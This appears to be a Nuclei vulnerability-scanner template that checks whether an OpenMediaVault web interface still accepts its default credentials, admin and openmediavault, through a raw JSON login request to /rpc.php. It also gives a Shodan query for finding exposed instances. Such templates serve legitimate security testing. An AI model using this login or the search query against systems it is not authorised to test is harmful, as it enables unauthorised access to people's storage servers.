id: openmediavault-default-login
info:
name: OpenMediaVault - Default Login
author: DhiyaneshDK
severity: high
reference:
- https://forum.openmediavault.org/index.php?thread/7784-default-login/
- https://soltveit.org/openmediavault-default-password/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:openmediavault:openmediavault:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"OpenMediaVault"
product: openmediavault
vendor: openmediavault
tags: default-login,openmediavault,vuln
http:
- raw:
- |
POST /rpc.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"service":"Session","method":"login","params":{"username":"{{username}}","password":"{{password}}"},"options":null}
attack: pitchfork
payloads:
username:
- admin
password:
- openmediavault
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"authenticated":true'
- '"permissions":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 4a0a0047304502202498f7c31d88e2217ef25bbbcab4db6f6cc0f11c0c675871fa1d67bcd09f8fa8022100ee04f7599c7652d39ad43ce53236ebfe1885383b18f8064a36ce809cf9a06393:922c64590222798bb761d5b6d8e72950